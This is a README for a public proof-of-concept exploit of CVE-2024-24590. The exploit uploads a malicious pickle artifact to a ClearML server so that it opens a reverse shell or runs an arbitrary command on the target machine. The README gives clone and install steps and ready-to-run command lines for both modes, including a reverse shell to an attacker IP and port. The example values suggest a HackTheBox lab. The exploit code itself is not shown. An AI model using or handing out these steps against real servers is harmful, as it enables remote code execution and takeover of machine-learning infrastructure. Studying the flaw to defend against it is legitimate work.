This repository contains a Python exploit script for CVE-2024-24590 The script is designed to upload a malicious pickle file to ClearML, which executes a reverse shell or a custom command.
- Uploads a malicious pickle artifact to ClearML.
- Executes a reverse shell or a custom command on the target machine.
- Supports custom project and task names.
- Allows setting a tag on the task.
- Python 3.x
- ClearML SDK
- argparse (usually included with Python)
-
Clone the repository:
git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git cd CVE-2024-24590-ClearML-RCE-CMD-POC
-
Install the ClearML SDK:
pip install clearml clearml-init
The script supports two modes of operation: default
and cmd
.
In this mode, you must provide the attacker's IP and port to establish a reverse shell.
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>
In this mode, you can provide a custom command to be executed.
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"
- HackTheBox: sl4sh1t0
- Telegram: sl4sh1t0
- X (Twitter): @diegogarciayala